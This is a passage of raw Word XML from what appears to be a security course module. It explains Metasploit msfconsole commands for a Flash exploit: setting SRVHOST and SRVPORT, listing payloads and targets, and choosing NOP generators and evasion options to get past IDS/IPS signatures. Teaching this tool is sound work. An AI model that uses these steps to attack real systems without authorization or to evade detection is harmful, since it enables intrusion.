      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>target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0,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Windows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selected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="484"/>
      </w:pP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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command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values: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Set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SRVHOST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192.168.0.100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to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change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the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SRVHOST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value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to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192.168.0.100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3"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="102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Set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SRVPORT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80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to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change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the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port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from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8080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to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80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun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spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1841"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3950684" cy="5057775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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684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</w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>msfconsole:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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52" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
      </w:pP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show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>options </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>again,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SRVHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="11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SRVPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>changed.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Boolean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false.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0" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="386"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>When you use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>show payloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>command, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the msfconsole will return a list of compatible payloads for this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit. In the flash player exploit example, it will return quite a few compatible payloads shown in Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="484"/>
      </w:pP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payload,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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>name: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Set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payload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Linux/x86/exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun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spacing w:before="9" w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="185"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6191250" cy="3249168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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</w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="48"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>msfconsole:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14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before="7"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pP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5" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="132"/>
        <w:ind w:left="185" w:right="386"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>show targets </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command will return a list of operating systems which are vulnerable to the selected ex-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ploit. When you run the command, you get the following output, shown in Figure CS-CNS-20010.8, for the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>adobe_flash_shader_drawing_fill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>targets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Windows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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to get additional info about this exploit and targets. To set a target, you can use the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>set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i/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9074" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155"/>
        <w:ind w:right="203"/>
        <w:jc w:val="center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set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target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line="252" w:lineRule="auto" w:before="170"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>By setting the target, the list of payloads will be reduced a lot because only payloads will be shown which are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-47"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compatible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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Linux),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13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Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.9.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0" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>advanced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>By using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>show advanced </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command, we can look at the advanced options for the exploit. An example is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shown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Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>set </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command, followed by the advanced parameter and the new value to change the advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>settings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9074" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155"/>
        <w:ind w:right="203"/>
        <w:jc w:val="center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set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displayablepayloadhandler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true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1"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pP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5" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Nops</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="386"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="35"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>return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list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NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generators.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NOP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short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Operation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is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>used to change the pattern of a NOP sled in order to bypass simple IDS/IPS signatures of common NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sleds. The NOP generators start with the CPU architecture in the name. An example is shown in Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.11.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both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337"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4587240" cy="2092928"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>CS-CNS-20010.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Options.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1547583</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4578667" cy="2268378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667" cy="226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1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:firstLine="298"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use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NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generator,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use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</w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>followed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name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NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generator.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the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit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launched,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NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sleds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will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taken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NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generator.</w:t>
      </w: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240" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="388"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>returns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list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available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>techniques.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example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shown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Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="484"/>
      </w:pP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change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>evasions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>settings,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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command,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evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="32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1" w:after="0"/>
        <w:ind w:left="746" w:right="0" w:hanging="562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="21"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:r>
